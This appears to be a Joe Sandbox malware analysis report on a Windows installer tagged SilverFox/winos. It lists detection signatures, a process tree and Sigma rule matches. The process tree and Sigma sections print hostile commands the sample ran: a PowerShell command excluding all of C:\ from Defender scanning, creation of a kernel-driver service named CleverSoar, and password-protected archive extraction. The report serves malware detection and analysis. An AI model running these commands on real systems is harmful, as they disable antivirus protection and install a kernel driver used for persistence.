Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe

Overview

General Information

Sample name:#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe
renamed because original name is a hash value
Original sample name:_1.1.6.exe
Analysis ID:1580553
MD5:1892cf920ffe70868b967804d9222b14
SHA1:2b2a0a6bbd472bf5aee0fb476d4ddd07f0c234dd
SHA256:459794c80f6ede491eefd8c6eabf5abe8cbd29a4d224e35072b38af2610f07d0
Tags:exeSilverFoxwinosuser-kafan_shengui
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe (PID: 6204 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe" MD5: 1892CF920FFE70868B967804D9222B14)
    • #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp (PID: 6416 cmdline: "C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp" /SL5="$10424,8943036,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe" MD5: F71908CEAB1076D5D4250CBFCB02E6B2)
      • powershell.exe (PID: 6556 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 932 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe (PID: 6688 cmdline: "C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe" /VERYSILENT MD5: 1892CF920FFE70868B967804D9222B14)
        • #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp (PID: 4284 cmdline: "C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp" /SL5="$302A2,8943036,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe" /VERYSILENT MD5: F71908CEAB1076D5D4250CBFCB02E6B2)
          • 7zr.exe (PID: 1136 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 1816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 1396 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 6396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6476 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3336 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3688 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6480 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5868 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6048 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5924 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3052 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6476 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3524 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6284 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5840 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6380 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2504 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3568 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6400 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6204 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5304 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6396 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5868 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2852 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6380 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1016 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3568 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3052 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6416 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4820 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2060 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5548 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2028 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4416 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6048 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 1016 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2088 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2424 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5304 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5544 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2060 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5548 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5672 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6364 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1436 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4364 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3052 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2424 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6440 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5544 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4956 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5216 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5672 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3220 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1832 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2020 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2564 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3180 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5304 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3620 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6016 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6612 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3448 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3368 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4584 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2564 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp" /SL5="$10424,8943036,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, ParentProcessId: 6416, ParentProcessName: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 6556, ProcessName: powershell.exe
Sigma detected: New Kernel Driver Via SC.EXE
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6476, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 3336, ProcessName: sc.exe
Sigma detected: Powershell Defender Exclusion
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp" /SL5="$10424,8943036,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, ParentProcessId: 6416, ParentProcessName: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 6556, ProcessName: powershell.exe
Sigma detected: New Service Creation Using Sc.EXE
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6476, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 3336, ProcessName: sc.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp" /SL5="$10424,8943036,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, ParentProcessId: 6416, ParentProcessName: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 6556, ProcessName: powershell.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\Windows NT\hrsw.vbcReversingLabs: Detection: 26%
Source: C:\Program Files (x86)\Windows NT\hrsw.vbcVirustotal: Detection: 37%Perma Link
Source: C:\Users\user\AppData\Local\Temp\is-DNFUF.tmp\update.vbcReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\is-Q5IJ4.tmp\update.vbcReversingLabs: Detection: 26%
Multi AV Scanner detection for submitted file
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exeVirustotal: Detection: 11%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 93.5% probability
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.1852873352.0000000000E40000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.1852683211.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CC2E090 FindFirstFileA,FindClose,FindClose,6_2_6CC2E090
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_006D6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,10_2_006D6868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_006D7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,10_2_006D7496
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000001.00000003.1802189265.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000001.00000003.1802189265.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000001.00000003.1802189265.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000001.00000003.1802189265.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000001.00000003.1802189265.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000001.00000003.1802189265.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000001.00000003.1802189265.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000001.00000003.1802189265.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
